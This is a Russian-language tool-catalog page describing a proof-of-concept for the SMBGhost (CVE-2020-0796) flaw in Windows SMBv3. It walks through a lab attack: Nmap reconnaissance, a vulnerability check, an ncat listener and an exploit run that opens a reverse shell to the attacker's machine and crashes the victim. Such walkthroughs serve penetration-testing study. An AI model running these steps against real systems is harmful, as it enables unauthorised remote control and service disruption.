Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-CVE-2020-0796 — Эксплойт-доказательство концепции для CVE-2020-0796 (SMBGhost), нацеленный на Windows 10/Server SMBv3.1.1. Включает разведку с помощью Nmap, сканирование уязвимостей и доставку полезной нагрузки обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/hungdnvp/poc-cve-2020-0796
РазведкаАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubhungdnvp/poc-cve-2020-0796

POC-CVE-2020-0796

Эксплойт-доказательство концепции для CVE-2020-0796 (SMBGhost), нацеленный на Windows 10/Server SMBv3.1.1. Включает разведку с помощью Nmap, сканирование уязвимостей и доставку полезной нагрузки обратной оболочки.

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

*- Затронутые версии

  • Windows 10 версия 1903 для 32-разрядных систем
  • Windows 10 версия 1903 для систем на базе ARM64
  • Windows 10 версия 1903 для 64-разрядных систем
  • Windows 10 версия 1909 для 32-разрядных систем
  • Windows 10 версия 1909 для систем на базе ARM64
  • Windows 10 версия 1909 для 64-разрядных систем
  • Windows Server, версия 1903 (установка Server Core)
  • Windows Server, версия 1909 (установка Server Core)

Схема подключения системы

image-20240223154022321

Разведка цели

Запуск Nmap для сканирования сети в зоне DMZ

root@kitploit:~
nmap -sS 192.168.116.0/24

nmap: название программы для сканирования сети.

-sS: выбор метода сканирования TCP SYN. При таком сканировании Nmap отправляет SYN-пакет на целевой хост и наблюдает за ответом. Если целевой хост отвечает SYN-ACK-пакетом, Nmap узнает, что порт открыт. Если целевой хост отвечает RST-пакетом, это означает, что порт закрыт.

192.168.116.0/24: конкретный IP-адрес или диапазон IP-адресов для сканирования. В данном случае диапазон — 192.168.116.0/24, охватывающий все адреса с 192.168.116.1 по 192.168.116.254.

image-scanNmap

=> Наблюдается, что у жертвы с IP-адресом 192.168.116.145 открыт порт 445.

· Использование Nmap для сканирования уязвимости на машине жертвы

root@kitploit:~
nmap -p445 --script smb-protocols 192.168.116.145

nmap: название программы для сканирования сети.

-p445: указание конкретного порта для сканирования, в данном случае порт 445. Порт 445 обычно используется для связи с службой SMB (Server Message Block) в системах Windows.

--script smb-protocols: выбор скрипта smb-protocols для выполнения сканирования. Этот скрипт помогает проверить и отобразить информацию о версиях протокола SMB, поддерживаемых на целевом хосте.

192.168.116.145: IP-адрес целевого хоста для сканирования. В данном случае IP-адрес установлен как 192.168.116.145.

image-sanNmap2

  • Результат smb-protocols показывает, что машина жертвы может быть уязвима и существует возможность эксплуатации SMBv3.1.1.

  • Для большей уверенности продолжаем проверку возможности эксплуатации уязвимости CVE-2020-0796 с помощью запуска Python-скрипта.

[]: -https://github.com/ly4k/SMBGhost "эксплойт"

image-nmapcheck

=> Результат Vulnerable -> обнаружена уязвимость CVE-2020-0796, которую можно эксплуатировать на машине жертвы.

Эксплуатация уязвимости, установка вредоносного ПО, создание канала удаленного управления

Проведение атаки Reverse_shell

Запуск сессии с помощью Netcat для прослушивания соединения от жертвы

root@kitploit:~
ncat -lvp 4444

Запуск скрипта эксплуатации CVE-2020-0796

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "эксплойт"

root@kitploit:~
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

image-attack

=> РЕЗУЛЬТАТ: Атакующая машина получает возможность выполнять shell-код на машине жертвы.

image-result

После успешного подключения атакующий может эксплуатировать и выполнять произвольный код на машине жертвы с правами пользователя, работающего в сессии.

При завершении сессии машина жертвы выдает синий экран (BlueScreen) и автоматически перезагружается.

image-end

Выполнение эксплуатации может привести к повреждению целевой системы

Скачать инструмент